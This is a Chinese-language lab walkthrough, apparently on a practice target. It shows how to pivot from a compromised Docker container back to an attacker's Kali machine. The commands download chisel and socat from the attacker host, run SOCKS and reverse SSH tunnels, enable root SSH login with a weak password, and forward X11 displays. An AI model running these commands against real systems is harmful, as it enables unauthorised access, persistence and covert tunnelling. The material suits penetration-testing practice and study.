在攻击机kali(ip:10.10.14.18)上运行chisel服务端:
chisel server -v -p 60080 --socks5在靶机的虚拟机(ssh [email protected])上,执行docker exec containers_sites_1 /bin/bash,进入容器里
进入容器后,先下载kali上的socat和chisel:
curl -o /bin/chisel http://10.10.14.18:30088/chisel;
chmod 0777 /bin/chisel ;
curl -o /bin/socat http://10.10.14.18:30088/socat.bin;
chmod 0777 /bin/socat ;
chisel client -v 10.10.14.18:60080 3080:socks &
mkdir -pv /tmp/.X11-unix/;
socat -d UNIX-LISTEN:/tmp/.X11-unix/X10,fork tcp4:10.10.14.18:6000 &
设置代理,来下载deb包:
export http_proxy="socks5h://127.0.0.1:3080";
export use_proxy=on;
curl -v cip.cc下载deb包.开启ssh服务,修改root密码:
apt update;
apt install -y openssh-server;
grep PermitRootLogin /etc/ssh/sshd_config;
sed -i 's/^#\?\(PermitRootLogin\)/\1 yes #/g' /etc/ssh/sshd_config;
grep PermitRootLogin /etc/ssh/sshd_config;
grep X11Forwarding /etc/ssh/sshd_config;
echo root:1|chpasswd;
/etc/init.d/ssh stop ;
/etc/init.d/ssh start ;# 下载GUI的示例代码:
# 如下命令在容器里敲:
apt-get install -y python3-tk;反弹容器的tcp22 端口,也就是ssh服务到kali的4444端口:
40022是kali的ssh服务端口,10.10.14.18是kali.
# 如下命令在容器里敲:
ssh -o StrictHostKeyChecking=no -Nf -R 4444:127.2.2.2:22 -p 40022 [email protected]回到kali攻击机,输入如下命令:
socat -d tcp4-l:6000,fork UNIX:/tmp/.X11-unix/X10 &
cat<<EOF>/tmp/qrt
set -x;
xhost +
echo export DISPLAY=:10.0
env|grep DIS
ssh -o StrictHostKeyChecking=no -X [email protected] -p 4444
EOF
最后在kali的GUI终端shell里,输入: . /tmp/qrt ,输入容器的密码1后,接着输入如下命令,进行测试:
export DISPLAY=:10.0
python3 -m tkinter;
如上还需手动敲2行代码:
进行如下改进:
cat<<EOF>/tmp/qrt
set -x;xhost +;
ssh -o StrictHostKeyChecking=no -X [email protected] -p 4444 -t "export DISPLAY=:10.0;python3 -m tkinter;bash -il;"
EOF看到弹了个小窗,就是成功了.
最后,在攻击机kali上存在如下文件:
# ls -al /root/.Xauthority
-rw------- 1 root root 59 May 24 13:07 /root/.Xauthority
cat /root/.Xauthority
参考文章:
https://www.cnblogs.com/jcchen1987/p/10553930.html
https://www.cnblogs.com/jcchen1987/p/10553930.html